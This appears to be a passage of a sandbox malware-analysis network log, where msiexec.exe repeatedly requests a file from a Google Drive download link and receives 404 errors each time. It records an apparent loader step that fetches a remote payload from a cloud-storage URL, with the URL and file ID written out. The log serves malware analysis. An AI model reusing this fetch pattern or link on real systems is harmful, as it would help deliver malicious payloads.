                                                                2025-01-11 03:35:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 62 62 39 55 74 49 4e 5f 71 65 50 69 56 6f 4e 47 6b 4d 5f 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wbb9UtIN_qePiVoNGkM_vA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.551657142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:04 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:04 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:04 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-udvaNfmo0aUImK-53Z--9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.551658142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:05 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:05 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgSkIiOjvxOkBjcDTPnVKwR1zVPNEMCwovW_WM8ns11gicG-RN5xMMcgMhxCiO9rpnlDjwfRV0s
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:05 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-mS0Zh3JswFLM1R3f8BCaNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:36:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 4a 56 50 46 71 4f 44 5f 48 34 6a 4d 6c 6e 6c 76 70 53 36 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DJVPFqOD_H4jMlnlvpS6Kg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.551659142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:16 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:16 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:16 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-Z4rdJbK0gw9gcVJJjzG1vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.551660142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:17 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:17 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC4oDPtqbBoUsR4Mti_r6LvSWQtk68nLrRhg3LHjZYzY7SOrtQ4Za-75HCvNp4oy25NytQkgZg4
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:17 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-Amm1HqpBSH0d6hU5XqFs6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:36:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 7a 6d 31 49 6e 6c 56 7a 57 61 45 41 54 37 77 36 74 43 31 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rzm1InlVzWaEAT7w6tC18g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.551661142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:28 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:28 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:28 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-r3gyL1jruu2JlMRgJ1-plg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.551662142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:29 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:29 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQB3PWRwQj0xG4b4R_WdMa3VpXfeGxaHfHpdO6TVJB23wTKsXi4hEMZcDzAQkKT-QMOt9Tz5vk
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:29 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-YM2cTR2qWgT4dOSpr51Sig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:36:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 7a 65 79 61 45 34 51 56 56 4c 34 45 6c 52 36 45 38 75 55 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YzeyaE4QVVL4ElR6E8uUEw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.551663142.250.181.2384431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:40 UTC418OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:41 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:40 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-AE1myHCXumctpA_exwdnoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.551664142.250.185.2254431472C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:36:41 UTC460OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
                                                                2025-01-11 03:36:42 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTxgGugA9uADex8NYgpVNhJqhaNe4icMWj4LVmTU-4F9awY1fqXY6t9-46hYRn3iohRxrAihvQ
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:36:42 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-wH5_hmduBPnj1W5p_XLs8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
